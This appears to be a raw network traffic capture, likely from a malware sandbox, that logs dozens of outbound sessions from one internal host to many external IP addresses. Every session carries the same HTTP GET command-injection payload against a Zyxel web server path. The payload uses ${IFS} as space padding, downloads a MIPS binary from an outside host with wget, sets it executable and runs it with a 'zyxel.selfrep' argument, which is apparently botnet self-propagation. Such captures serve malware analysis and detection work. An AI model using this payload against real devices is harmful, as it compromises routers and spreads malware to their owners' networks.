                                                Jan 12, 2024 18:24:26.611953974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2030192.168.2.1342056163.196.185.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.611993074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2031192.168.2.133297861.95.67.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.612015009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2032192.168.2.135042085.221.194.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.612070084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2033192.168.2.1338914207.171.240.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.612102985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2034192.168.2.1339350168.238.131.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.612152100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2035192.168.2.135632296.96.139.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.612179995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2036192.168.2.1333928176.16.18.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.612212896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2037192.168.2.1358004102.113.83.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.612236977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2038192.168.2.1354846182.222.231.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.612276077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2039192.168.2.135844091.229.233.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.612329960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2040192.168.2.1338026208.194.129.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.612377882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2041192.168.2.1335126150.102.211.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.612409115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2042192.168.2.135089240.208.182.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.612458944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2043192.168.2.135412223.97.71.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.612472057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2044192.168.2.1343314199.36.229.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.612525940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2045192.168.2.133940625.98.40.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.612556934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2046192.168.2.135261479.152.165.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.612620115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2047192.168.2.1345424217.29.231.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.612651110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2048192.168.2.1360340123.27.238.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.612704992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2049192.168.2.133937454.130.214.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.612726927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2050192.168.2.13553801.14.219.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.612756968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2051192.168.2.133632472.120.193.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.612788916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2052192.168.2.1336310136.56.200.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.612839937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2053192.168.2.1349550151.189.2.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.612869024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2054192.168.2.1349854182.156.159.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.612894058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2055192.168.2.134792224.139.144.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.612937927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2056192.168.2.134483446.25.252.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.612956047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2057192.168.2.135442671.248.248.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.612999916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2058192.168.2.135828038.241.76.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.613037109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2059192.168.2.135629673.198.229.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.613081932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2060192.168.2.1346808208.107.149.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.613116980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2061192.168.2.134830060.206.57.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.613167048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2062192.168.2.134495048.118.2.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.613184929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2063192.168.2.1350030202.61.243.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.613240004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2064192.168.2.133626862.17.68.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.613270998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2065192.168.2.1340750221.110.60.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.613301992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2066192.168.2.134948238.240.154.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.613337994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2067192.168.2.135718235.195.128.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.613374949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2068192.168.2.134201041.66.140.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.613429070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2069192.168.2.1344760205.15.78.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.613447905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2070192.168.2.1342974106.29.193.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.613486052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2071192.168.2.1344240198.246.22.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.613529921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2072192.168.2.134746693.59.143.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.613564014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2073192.168.2.1337788102.167.84.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.613611937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2074192.168.2.1337910136.129.150.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.613646984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2075192.168.2.13535805.191.38.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.613686085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2076192.168.2.1338224189.119.16.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.613712072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2077192.168.2.135483032.218.229.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.613764048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2078192.168.2.135401436.197.42.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.613816023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2079192.168.2.1347304106.195.153.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.613847017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2080192.168.2.1355910143.229.82.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.613903999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2081192.168.2.1342266222.143.122.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.613923073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2082192.168.2.133698853.170.173.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.613998890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2083192.168.2.1338570187.117.59.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.614017963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2084192.168.2.1356988212.10.213.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.614078999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2085192.168.2.1347174129.77.18.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.614125967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2086192.168.2.135438646.134.156.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.614160061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2087192.168.2.1352350190.190.132.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.614204884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2088192.168.2.1350262115.208.58.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.614254951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2089192.168.2.133650662.137.84.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.614346981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2090192.168.2.1360196158.217.23.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.614382982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2091192.168.2.134229060.157.235.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.614414930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2092192.168.2.1342086132.196.169.232443
                                                TimestampBytes transferredDirectionData
